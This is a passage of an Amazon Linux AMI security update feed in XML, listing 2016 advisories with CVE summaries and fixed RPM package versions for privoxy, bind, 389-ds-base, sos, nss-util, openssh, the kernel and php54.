1300966:
CVE-2016-1982 privoxy: invalid reads in case of corrupt chunk-encoded content
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1982" title="" id="CVE-2016-1982" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1983" title="" id="CVE-2016-1983" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="privoxy" version="3.0.23" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/privoxy-3.0.23-2.7.amzn1.x86_64.rpm</filename></package><package name="privoxy-debuginfo" version="3.0.23" release="2.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/privoxy-debuginfo-3.0.23-2.7.amzn1.x86_64.rpm</filename></package><package name="privoxy" version="3.0.23" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/privoxy-3.0.23-2.7.amzn1.i686.rpm</filename></package><package name="privoxy-debuginfo" version="3.0.23" release="2.7.amzn1" epoch="0" arch="i686"><filename>Packages/privoxy-debuginfo-3.0.23-2.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-664</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-664: important priority package update for 389-ds-base</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0741:
An infinite-loop vulnerability was discovered in the 389 directory server, where the server failed to correctly handle unexpectedly closed client connections. A remote attacker able to connect to the server could use this flaw to make the directory server consume an excessive amount of CPU and stop accepting connections (denial of service).
1299416:
CVE-2016-0741 389-ds-base: worker threads do not detect abnormally closed connections causing DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0741" title="" id="CVE-2016-0741" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.4.0-26.47.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.4.0-26.47.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.4.0-26.47.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.4.0-26.47.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.4.0-26.47.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.4.0-26.47.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.4.0-26.47.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.4.0" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.4.0-26.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-665</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-665: important priority package update for bind</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1286:
An error when parsing signature records for DNAME records having specific properties can lead to named exiting due to an assertion failure in resolver.c or db.c. An attacker able to cause a server to make a query deliberately chosen to generate a malicious response can cause named to stop execution with an assertion failure, resulting in denial of service to clients.
CVE-2016-1285:
A defect in control channel input handling was discovered which can cause named to exit due to an assertion failure in sexpr.c or alist.c when a malformed packet is sent to named's control channel. If control channel input is accepted from the network (limited to localhost by default), an unauthenticated attacker could cause named to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1285" title="" id="CVE-2016-1285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1286" title="" id="CVE-2016-1286" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.45.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.45.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.45.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-666</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-666: medium priority package update for sos</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7529:
An insecure temporary file use flaw was found in the way sos created certain sosreport files. A local attacker could possibly use this flaw to perform a symbolic link attack to reveal the contents of sosreport files, or in some cases modify arbitrary files and escalate their privileges on the system.
1282542:
CVE-2015-7529 sos: Usage of predictable temporary files allows privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7529" title="" id="CVE-2015-7529" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sos" version="3.2" release="28.17.amzn1" epoch="0" arch="noarch"><filename>Packages/sos-3.2-28.17.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-667</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-667: critical priority package update for nss-util</title><issued date="2016-03-10 16:30:00" /><updated date="2016-03-10 16:30:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1950:
A heap-based buffer overflow flaw was found in the way NSS parsed certain ASN.1 structures. An attacker could use this flaw to create a specially crafted certificate which, when parsed by NSS, could cause it to crash, or execute arbitrary code, using the permissions of the user running an application compiled against the NSS library.
1310509:
CVE-2016-1950 nss: Heap buffer overflow vulnerability in ASN1 certificate parsing (MFSA 2016-35)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1950" title="" id="CVE-2016-1950" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-util" version="3.19.1" release="9.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.19.1-9.49.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.19.1" release="9.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.19.1-9.49.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.19.1" release="9.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.19.1-9.49.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.19.1" release="9.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.19.1-9.49.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.19.1" release="9.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.19.1-9.49.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.19.1" release="9.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.19.1-9.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-668</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-668: medium priority package update for openssh</title><issued date="2016-03-16 16:30:00" /><updated date="2016-03-16 16:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3115:
1316829:
CVE-2016-3115 openssh: missing sanitisation of input for X11 forwarding
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3115" title="" id="CVE-2016-3115" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-keycat" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.6.1p1-23.60.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.23.60.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.6.1p1-23.60.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.6.1p1-23.60.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.6.1p1-23.60.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.6.1p1-23.60.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.6.1p1-23.60.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.6.1p1-23.60.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.6.1p1-23.60.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.6.1p1-23.60.amzn1.i686.rpm</filename></package><package name="openssh" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.6.1p1-23.60.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.23.60.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.23.60.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.6.1p1-23.60.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="23.60.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.6.1p1-23.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-669</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-669: medium priority package update for kernel</title><issued date="2016-03-16 16:30:00" /><updated date="2016-12-23 21:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3157:
An issue was discovered in the kernel, running as a Xen 64-bit PV guest, where user mode processes to be granted permission to I/O ports, resulting in local privilege escalation, crashes, or information leaks.
CVE-2016-2847:
1313428:
CVE-2016-2847 kernel: pipe: limit the per-user amount of pages allocated in pipes
CVE-2016-2550:
A resource-exhaustion vulnerability was found in the kernel, where an unprivileged process could allocate and accumulate far more file descriptors than the process&#039; limit. A local, unauthenticated user could exploit this flaw by sending file descriptors over a Unix socket and then closing them to keep the process&#039; fd count low, thereby creating kernel-memory or file-descriptors exhaustion (denial of service).
1311517:
CVE-2016-2550 kernel: incorrectly accounted in-flight fds
CVE-2016-2383:
1308452:
CVE-2016-2383 kernel: incorrect branch fixups for eBPG allow arbitrary read
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2383" title="" id="CVE-2016-2383" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2550" title="" id="CVE-2016-2550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2847" title="" id="CVE-2016-2847" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3157" title="" id="CVE-2016-3157" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.1.19" release="24.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.1.19-24.31.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="perf" version="4.1.19" release="24.31.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.1.19-24.31.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.1.19" release="24.31.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.1.19-24.31.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-670</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-670: low priority package update for php54</title><issued date="2016-03-16 16:30:00" /><updated date="2016-03-16 16:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6838:
A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.
1260711:
CVE-2015-6837 CVE-2015-6838 php: NULL pointer dereference in XSLTProcessor class
CVE-2015-6837:
A NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.
1260711:
CVE-2015-6837 CVE-2015-6838 php: NULL pointer dereference in XSLTProcessor class
CVE-2015-6836:
A flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.
1260683:
CVE-2015-6836 php: SOAP serialize_function_call() type confusion
CVE-2015-6835:
1260647:
CVE-2015-6835 php: use-after-free vulnerability in session deserializer
CVE-2015-6834:
1260642:
CVE-2015-6834 php: multiple unserialization use-after-free issues
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6834" title="" id="CVE-2015-6834" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6835" title="" id="CVE-2015-6835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6836" title="" id="CVE-2015-6836" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6837" title="" id="CVE-2015-6837" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6838" title="" id="CVE-2015-6838" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-debuginfo" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.45" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.45-1.75.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.45" release="1.75.amzn1" epoch="0" 